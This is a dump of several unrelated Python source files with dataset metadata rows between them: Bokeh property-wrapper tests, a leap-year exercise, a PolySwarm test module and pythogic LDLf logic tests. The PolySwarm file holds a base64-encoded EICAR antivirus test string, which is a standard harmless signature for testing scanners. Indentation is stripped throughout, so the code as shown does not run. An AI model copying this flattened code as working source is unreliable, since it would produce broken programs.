assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == (source, dict(foo=[10], bar=[20], baz=[30]))
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnDataChangedEvent)
assert mock_notify.call_args[1]['hint'].column_source == source
assert sorted(mock_notify.call_args[1]['hint'].cols) == ['bar', 'foo']
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_to_list(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 20]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_to_array(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert (mock_notify.call_args[0][0]['foo'] == np.array([10])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_list_with_rollover(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[40]), rollover=3, setter="setter")
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [20, 30, 40]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == 3
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_to_array(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert (mock_notify.call_args[0][0]['foo'] == np.array([10])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_to_list(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[20]), setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert mock_notify.call_args[0] == ({'foo': [10, 20]},) # streaming to list, "old" is actually updated value
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == None
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__stream_array_with_rollover(mock_notify) -> None:
from bokeh.document.events import ColumnsStreamedEvent
import numpy as np
source = ColumnDataSource(data=dict(foo=np.array([10, 20, 30])))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._stream("doc", source, dict(foo=[40]), rollover=3, setter="setter")
assert mock_notify.call_count == 1
assert len(mock_notify.call_args[0]) == 1
assert 'foo' in mock_notify.call_args[0][0]
assert (mock_notify.call_args[0][0]['foo'] == np.array([10, 20, 30])).all()
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsStreamedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
assert mock_notify.call_args[1]['hint'].rollover == 3
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_simple_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(1, 40)]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 40]},)
assert pvcd == dict(foo=[10, 40])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_repeated_simple_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(1, 40), (1, 50)]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [10, 50]},)
assert pvcd == dict(foo=[10, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_slice_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30, 40, 50]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(slice(2), [1,2])]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [1, 2, 30, 40, 50]},)
assert pvcd == dict(foo=[1, 2, 30, 40, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueColumnData__patch_with_overlapping_slice_indices(mock_notify) -> None:
from bokeh.document.events import ColumnsPatchedEvent
source = ColumnDataSource(data=dict(foo=[10, 20, 30, 40, 50]))
pvcd = bcpw.PropertyValueColumnData(source.data)
mock_notify.reset_mock()
pvcd._patch("doc", source, dict(foo=[(slice(2), [1,2]), (slice(1,3), [1000,2000])]), setter='setter')
assert mock_notify.call_count == 1
assert mock_notify.call_args[0] == ({'foo': [1, 1000, 2000, 40, 50]},)
assert pvcd == dict(foo=[1, 1000, 2000, 40, 50])
assert 'hint' in mock_notify.call_args[1]
assert isinstance(mock_notify.call_args[1]['hint'], ColumnsPatchedEvent)
assert mock_notify.call_args[1]['hint'].setter == 'setter'
@patch('bokeh.core.property.wrappers.PropertyValueContainer._notify_owners')
def test_PropertyValueList_mutators(mock_notify) -> None:
pvl = bcpw.PropertyValueList([10, 20, 30, 40, 50])
mock_notify.reset_mock()
del pvl[2]
assert mock_notify.called
# this exercises __delslice__ on Py2 but not Py3 which just
# uses __delitem__ and a slice index
mock_notify.reset_mock()
del pvl[1:2]
assert mock_notify.called
mock_notify.reset_mock()
pvl += [888]
assert mock_notify.called
mock_notify.reset_mock()
pvl *= 2
assert mock_notify.called
mock_notify.reset_mock()
pvl[0] = 2
assert mock_notify.called
# this exercises __setslice__ on Py2 but not Py3 which just
# uses __setitem__ and a slice index
mock_notify.reset_mock()
pvl[3:1:-1] = [21, 31]
assert mock_notify.called
mock_notify.reset_mock()
pvl.append(999)
assert mock_notify.called
mock_notify.reset_mock()
pvl.extend([1000])
assert mock_notify.called
mock_notify.reset_mock()
pvl.insert(0, 100)
assert mock_notify.called
mock_notify.reset_mock()
pvl.pop()
assert mock_notify.called
mock_notify.reset_mock()
pvl.remove(100)
assert mock_notify.called
mock_notify.reset_mock()
pvl.reverse()
assert mock_notify.called
mock_notify.reset_mock()
pvl.sort()
assert mock_notify.called
    # OK, this is just to get 100% test coverage in py3 despite the py2 vs py3
    # differences: the slice methods only exist in py2. The tests above exercise
    # all the cases; this just makes py3 report the py2-only code as covered.
try:
pvl.__setslice__(1,2,3)
except:
pass
try:
pvl.__delslice__(1,2)
except:
pass
def test_PropertyValueColumnData___copy__() -> None:
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = source.data.__copy__()
assert source.data == pvcd
assert id(source.data) != id(pvcd)
pvcd['foo'][0] = 20
assert source.data['foo'][0] == 20
def test_PropertyValueColumnData___deepcopy__() -> None:
source = ColumnDataSource(data=dict(foo=[10]))
pvcd = source.data.__deepcopy__()
assert source.data == pvcd
assert id(source.data) != id(pvcd)
pvcd['foo'][0] = 20
assert source.data['foo'][0] == 10
def test_Property_wrap() -> None:
for x in (Bool, Int, Float, Complex, String, Enum, Color,
Regex, Seq, Tuple, Instance, Any, Interval, Either,
DashPattern, Size, Percent, Angle, MinMaxBounds):
for y in (0, 1, 2.3, "foo", None, (), [], {}):
r = x.wrap(y)
assert r == y
assert isinstance(r, type(y))
def test_List_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), {}):
r = List.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = List.wrap([1,2,3])
assert r == [1,2,3]
assert isinstance(r, bcpw.PropertyValueList)
r2 = List.wrap(r)
assert r is r2
def test_Dict_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), []):
r = Dict.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = Dict.wrap(dict(a=1, b=2))
assert r == dict(a=1, b=2)
assert isinstance(r, bcpw.PropertyValueDict)
r2 = Dict.wrap(r)
assert r is r2
def test_ColumnData_wrap() -> None:
for y in (0, 1, 2.3, "foo", None, (), []):
r = ColumnData.wrap(y)
assert r == y
assert isinstance(r, type(y))
r = ColumnData.wrap(dict(a=1, b=2))
assert r == dict(a=1, b=2)
assert isinstance(r, bcpw.PropertyValueColumnData)
r2 = ColumnData.wrap(r)
assert r is r2
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcpw, ALL)
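
# Added illustration -- a minimal sketch (assumed behaviour, not part of the
# original suite) of how these wrappers surface in user code: assigning a
# container to a Bokeh property wraps it, so in-place mutations can notify the
# owning model:
#
#     source = ColumnDataSource(data=dict(x=[1, 2]))
#     type(source.data)          # bcpw.PropertyValueColumnData
#     source.data['x'] = [3, 4]  # instrumented __setitem__ notifies the owner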
| 36.934874 | 116 | 0.64547 | 2,187 | 17,581 | 4.984911 | 0.103338 | 0.128417 | 0.095028 | 0.102367 | 0.81031 | 0.802697 | 0.788663 | 0.769308 | 0.754082 | 0.713722 | 0 | 0.028558 | 0.1575 | 17,581 | 475 | 117 | 37.012632 | 0.707467 | 0.118935 | 0 | 0.589235 | 0 | 0 | 0.100919 | 0.064021 | 0 | 0 | 0 | 0 | 0.362606 | 1 | 0.070822 | false | 0.008499 | 0.05949 | 0.002833 | 0.133144 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
92fd6589e17abf1310e7b543cae7a6456d1e6b6d | 238 | py | Python | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | student-work/cassandradelieto/exercism/python/leap/leap.py | developerQuinnZ/this_will_work | 5587a9fd030b47f9df6514e45c887b6872d2a4a1 | [
"MIT"
] | null | null | null | # A leap year is any year that is evenly divisible by 4,
# except every year that is evenly divisible by 100,
# unless the year is also evenly divisible by 400.
def is_leap_year(year):
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
| 29.75 | 66 | 0.701681 | 44 | 238 | 3.75 | 0.477273 | 0.272727 | 0.309091 | 0.181818 | 0.387879 | 0.387879 | 0.387879 | 0 | 0 | 0 | 0 | 0.091398 | 0.218487 | 238 | 7 | 67 | 34 | 0.795699 | 0.584034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 6 |
1301d0d0113cc2b732d5f53dbe0f4f4797d369a6 | 149 | py | Python | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | 3 | 2021-07-08T19:16:37.000Z | 2022-01-11T08:41:04.000Z | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | 1 | 2021-07-27T18:33:32.000Z | 2021-07-27T18:33:32.000Z | tests/__init__.py | polyswarm/microengine-webhooks-py | 708b936cb298e556e8c19cd6c02477c028e2ce89 | [
"MIT"
] | null | null | null | import base64
EICAR_STRING = base64.b64decode(
'WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo='
)
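
# Added note: the bytes above decode to the standard EICAR anti-virus test
# string -- a harmless payload that scanners are expected to flag, useful for
# exercising scanning microengines without shipping real malware.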
| 24.833333 | 98 | 0.872483 | 7 | 149 | 18.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087591 | 0.080537 | 149 | 5 | 99 | 29.8 | 0.854015 | 0 | 0 | 0 | 0 | 0 | 0.61745 | 0.61745 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1307c4ac00666f520833f1ca0359cf2b59432345 | 109,753 | py | Python | tests/test_ldlf_emptytraces.py | MarcoFavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 4 | 2018-02-21T10:43:55.000Z | 2018-04-13T07:55:04.000Z | tests/test_ldlf_emptytraces.py | marcofavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 34 | 2018-03-04T18:30:12.000Z | 2018-08-14T21:36:29.000Z | tests/test_ldlf_emptytraces.py | marcofavorito/pythogic | aaa74fec41fbf08d96371f62218c462e9a2b69e0 | [
"MIT"
] | 1 | 2018-03-04T18:27:57.000Z | 2018-03-04T18:27:57.000Z | import unittest
from pprint import pprint
from pythogic.ldlf_empty_traces.LDLf_EmptyTraces import LDLf_EmptyTraces
from pythogic.ltlf.semantics.FiniteTrace import FiniteTrace
from pythogic.base.Formula import AtomicFormula, Not, And, Or, PathExpressionUnion, PathExpressionSequence, \
PathExpressionStar, PathExpressionTest, PathExpressionEventually, Next, Until, PathExpressionAlways, TrueFormula, \
LogicalTrue, LogicalFalse, End, FalseFormula, LDLfLast
from pythogic.base.Alphabet import Alphabet
from pythogic.base.Symbol import Symbol
from pythogic.pl.PL import PL
from pythogic.base.utils import print_nfa, print_dfa, _to_pythomata_dfa, _to_pythomata_nfa
class TestLDLfEmptyTraces(unittest.TestCase):
"""Tests for `pythogic.ldlf_empty_traces` package."""
def setUp(self):
# Symbols
self.a_sym = Symbol("a")
self.b_sym = Symbol("b")
self.c_sym = Symbol("c")
# Propositions
self.a = AtomicFormula(self.a_sym)
self.b = AtomicFormula(self.b_sym)
self.c = AtomicFormula(self.c_sym)
# Propositionals
self.not_a = Not(self.a)
self.not_b = Not(self.b)
self.not_c = Not(self.c)
self.a_and_b = And(self.a, self.b)
self.a_and_c = And(self.a, self.c)
self.b_and_c = And(self.b, self.c)
self.abc = And(self.a, And(self.b, self.c))
self.b_or_c = Or(self.b, self.c)
self.a_or_b = Or(self.a, self.b)
self.not_abc = Not(And(self.a, And(self.b, self.c)))
### Path expression
# Tests
self.test_a = PathExpressionTest(self.a)
self.test_b = PathExpressionTest(self.b)
self.test_not_a = PathExpressionTest(self.not_a)
self.test_not_b = PathExpressionTest(self.not_b)
# Union
self.path_a_or_b = PathExpressionUnion(self.a, self.b)
self.path_b_or_c = PathExpressionUnion(self.b, self.c)
# Sequence
self.path_seq_a_and_b__a_and_c = PathExpressionSequence(self.a_and_b, self.a_and_c)
self.path_a_or_b__b_or_c = PathExpressionSequence(self.path_a_or_b, self.path_b_or_c)
# Stars
self.path_b_or_c_star = PathExpressionStar(self.path_b_or_c)
self.path_not_abc = PathExpressionStar(self.not_abc)
# Modal connective
self.eventually_propositional_a_and_b__a_and_c = PathExpressionEventually(self.a_and_b, self.a_and_c)
self.eventually_test_a__c = PathExpressionEventually(self.test_a, self.c)
self.eventually_test_a__b = PathExpressionEventually(self.test_a, self.b)
self.eventually_seq_a_and_b__a_and_c__not_c = PathExpressionEventually(self.path_seq_a_and_b__a_and_c,
self.not_c)
self.eventually_seq_a_and_b__a_and_c__c = PathExpressionEventually(self.path_seq_a_and_b__a_and_c, self.c)
self.eventually_b_or_c_star__b_and_c = PathExpressionEventually(self.path_b_or_c_star, self.b_and_c)
self.next_a_and_c = PathExpressionEventually(TrueFormula(), self.a_and_c)
self.liveness_b_and_c = PathExpressionEventually(PathExpressionStar(TrueFormula()), self.b_and_c)
self.liveness_abc = PathExpressionEventually(PathExpressionStar(TrueFormula()), self.abc)
self.always_true__a = PathExpressionAlways(PathExpressionStar(TrueFormula()), self.a)
self.always_true__b_or_c = PathExpressionAlways(PathExpressionStar(TrueFormula()), self.b_or_c)
self.alphabet = Alphabet({self.a_sym, self.b_sym, self.c_sym})
# Traces
self.ldlf = LDLf_EmptyTraces(self.alphabet)
self.trace_1_list = [
{self.a_sym, self.b_sym},
{self.a_sym, self.c_sym},
{self.a_sym, self.b_sym},
{self.a_sym, self.c_sym},
{self.b_sym, self.c_sym},
]
self.trace_1 = FiniteTrace(self.trace_1_list, self.alphabet)
def test_truth(self):
self.assertFalse(self.ldlf.truth(self.not_a, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.not_a, self.trace_1, 4))
self.assertTrue(self.ldlf.truth(self.a_and_b, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.a_and_b, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(self.a_or_b, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(Not(And(self.b, self.c)), self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 1))
self.assertTrue(self.ldlf.truth(self.eventually_propositional_a_and_b__a_and_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_test_a__c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_test_a__b, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__not_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.eventually_seq_a_and_b__a_and_c__c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.next_a_and_c, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.liveness_b_and_c, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.liveness_abc, self.trace_1, 0))
self.assertFalse(self.ldlf.truth(self.always_true__a, self.trace_1, 0))
self.assertTrue(self.ldlf.truth(self.always_true__a, self.trace_1.segment(0, self.trace_1.length() - 1), 0))
self.assertTrue(self.ldlf.truth(self.always_true__b_or_c, self.trace_1, 0))
# self.assertTrue(self.ldlf.truth(self.always_not_abc__b_and_c, self.trace_1, 0))
# self.assertTrue(self.ldlf.truth(self.trace_1, 0, self.eventually_b_or_c_star__b_and_c))
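
# Added note (a sketch restating what test_truth above exercises):
# truth(f, t, i) evaluates an LDLf formula f over a finite trace t starting at
# position i. For example, And(a, b) holds at step 0 of trace_1 because its
# first symbol set is {a, b}, while the "always" formula [true*]a fails on the
# full trace because the last step {b, c} does not contain a.
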
class TestLDLfEmptyTracesIsFormula(TestLDLfEmptyTraces):
def test_is_formula_allowed_formulas(self):
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertTrue(self.ldlf.is_formula(tt))
self.assertTrue(self.ldlf.is_formula(Not(tt)))
self.assertTrue(self.ldlf.is_formula(and_tt))
self.assertTrue(self.ldlf.is_formula(eventually_atomic_tt))
self.assertTrue(self.ldlf.is_formula(eventually_not_tt))
self.assertTrue(self.ldlf.is_formula(eventually_and_tt))
# introduce a new symbol
self.assertFalse(self.ldlf.is_formula(eventually_and_tt_error))
self.assertTrue(self.ldlf.is_formula(eventually_test_tt))
self.assertTrue(self.ldlf.is_formula(eventually_sequence_tt))
self.assertTrue(self.ldlf.is_formula(eventually_union_tt))
self.assertTrue(self.ldlf.is_formula(eventually_star_tt))
def test_is_formula_allowed_formulas_combinations(self):
tt = LogicalTrue()
and_tt = And(tt, Not(tt))
and_ab = And(self.a, self.b)
complex_path = PathExpressionSequence(PathExpressionUnion(and_ab, PathExpressionStar(and_ab)),
PathExpressionTest(PathExpressionEventually(and_ab, tt)))
complex_eventually = PathExpressionEventually(complex_path, and_tt)
self.assertTrue(self.ldlf.is_formula(complex_eventually))
def test_is_formula_derived_formulas(self):
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
eventually_test_tt_error = PathExpressionEventually(PathExpressionTest(AtomicFormula.fromName("d")), tt)
self.assertTrue(self.ldlf.is_formula(LogicalFalse()))
self.assertTrue(self.ldlf.is_formula(Or(tt, tt)))
self.assertTrue(self.ldlf.is_formula(Next(tt)))
self.assertTrue(self.ldlf.is_formula(Until(Next(tt), tt)))
self.assertTrue(self.ldlf.is_formula(Until(Next(tt), tt)))
self.assertTrue(self.ldlf.is_formula(End()))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(and_ab, and_tt)))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(TrueFormula(), and_tt)))
self.assertTrue(self.ldlf.is_formula(PathExpressionAlways(FalseFormula(), and_tt)))
self.assertTrue(self.ldlf.is_formula(LDLfLast()))
# a propositional is not an elementary formula
self.assertTrue(self.ldlf.is_formula(and_ab))
self.assertFalse(self.ldlf.is_formula(And(self.a, AtomicFormula.fromName("d"))))
# a propositional is not an elementary formula, neither in the Test expression
self.assertTrue(self.ldlf.is_formula(eventually_test_tt))
self.assertFalse(self.ldlf.is_formula(eventually_test_tt_error))
class TestLDLfEmptyTracesExpandFormula(TestLDLfEmptyTraces):
def test_expand_formula_allowed_formula(self):
"""Expansion of elementary formula should return the same formula."""
tt = LogicalTrue()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertEqual(self.ldlf.expand_formula(tt), tt)
self.assertEqual(self.ldlf.expand_formula(Not(tt)), Not(tt))
self.assertEqual(self.ldlf.expand_formula(and_tt), and_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_atomic_tt), eventually_atomic_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_not_tt), eventually_not_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_and_tt), eventually_and_tt)
        # introduce a new symbol. Notice: it does not throw an error
self.assertEqual(self.ldlf.expand_formula(eventually_and_tt_error), eventually_and_tt_error)
self.assertEqual(self.ldlf.expand_formula(eventually_test_tt), eventually_test_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_sequence_tt), eventually_sequence_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_union_tt), eventually_union_tt)
self.assertEqual(self.ldlf.expand_formula(eventually_star_tt), eventually_star_tt)
def test_expand_formula_derived_formula(self):
tt = LogicalTrue()
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
expanded_logicalFalse = Not(tt)
# expanded_falseformula = And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
# expanded_trueformula = Not(And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC))
expanded_falseformula = FalseFormula()
expanded_trueformula = TrueFormula()
expanded_end = Not(PathExpressionEventually(expanded_trueformula, Not(expanded_logicalFalse)))
expanded_last = PathExpressionEventually(expanded_trueformula, expanded_end)
expanded_eventually_test_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(self.a, tt)),
tt)
always_ = PathExpressionAlways(and_ab, tt)
next_ = Next(tt)
until_ = Until(tt, tt)
expanded_always_ = Not(PathExpressionEventually(and_ab, Not(tt)))
expanded_next_ = PathExpressionEventually(expanded_trueformula, And(tt, Not(expanded_end)))
expanded_until = PathExpressionEventually(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), expanded_trueformula)),
And(tt, Not(expanded_end))
)
self.assertEqual(self.ldlf.expand_formula(LogicalFalse()), expanded_logicalFalse)
self.assertEqual(self.ldlf.expand_formula(Or(tt, tt)), Not(And(Not(tt), Not(tt))))
self.assertEqual(self.ldlf.expand_formula(always_), expanded_always_)
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(TrueFormula(), tt)),PathExpressionEventually(expanded_trueformula, tt))
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(FalseFormula(), tt)),PathExpressionEventually(expanded_falseformula, tt))
self.assertEqual(self.ldlf.expand_formula(PathExpressionEventually(TrueFormula(), End())),PathExpressionEventually(expanded_trueformula, expanded_end))
self.assertEqual(self.ldlf.expand_formula(LDLfLast()), expanded_last)
self.assertEqual(self.ldlf.expand_formula(next_), expanded_next_)
self.assertEqual(self.ldlf.expand_formula(until_), expanded_until)
# a propositional is not an elementary formula
self.assertEqual(self.ldlf.expand_formula(and_ab), PathExpressionEventually(and_ab, tt))
# a propositional is not an elementary formula, neither in the Test expression
self.assertEqual(self.ldlf.expand_formula(eventually_test_tt), expanded_eventually_test_tt)
class TestLDLfEmptyTracesToNNF(TestLDLfEmptyTraces):
def test_to_nnf_allowed_formulas(self):
tt = LogicalTrue()
ff = LogicalFalse()
and_tt = And(tt, tt)
and_ab = And(self.a, self.b)
test_tt = PathExpressionTest(tt)
eventually_atomic_tt = PathExpressionEventually(self.a, tt)
eventually_not_tt = PathExpressionEventually(Not(self.a), tt)
eventually_and_tt = PathExpressionEventually(and_ab, tt)
eventually_and_tt_error = PathExpressionEventually(And(self.a, AtomicFormula.fromName("d")), tt)
eventually_test_tt = PathExpressionEventually(test_tt, tt)
